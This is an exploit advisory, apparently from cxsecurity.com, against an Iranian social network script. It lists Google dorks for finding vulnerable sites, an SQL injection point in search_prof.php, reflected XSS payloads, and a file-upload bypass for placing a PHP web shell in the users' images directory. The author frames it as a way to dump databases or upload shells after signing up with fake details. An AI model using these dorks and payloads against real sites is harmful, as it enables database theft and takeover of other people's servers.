Iranian Social Network Multiple Exploit

2018.04.12
ir GIST (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################################## # Title : Iranian Social Network Multiple Exploit # Date : 12 April 2018 # Tested on : Ubuntu/Windows 10 # Google Dork : inurl:/register.php intitle:شبکه اجتماعی # Google Dork2 : inurl:/news2.php?id= intitle:شبکه اجتماعی # Author : GIST # Vendor : http://sana-net.com/ # Exploit Type : Remote # Version : All Version # CVE : - ########################################################### Description : Iranian Social Network Have Multiple Vulnerablity (Sqli , Xss , File Upload). We can inject and download database or upload shell. For using this vulnerabilities first you have to register with fake information then you can use the vulnerabilities Sql Injection : Url : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219' Request Method : Post -- response -- HTTP/1.1 200OK Server nginx/1.4.6 (Ubuntu) Date: Thu, 10 mar 2016 19:18:47 GMT Content-Type: text/html Transfer-Encoding: Chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:51:00 GMT Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragme: no-cache Content-encoing: gzip Xss : URL : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219 commands : <script>alert('Xss')</script> or "><script>alert('Xss')</script> File Upload : URL : /editprofilepic.php Method : Post Convert .php to .jpg and choose your shell and bypass file to .php with live http header. Directory Shell : site.com/images/users/shell.php


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top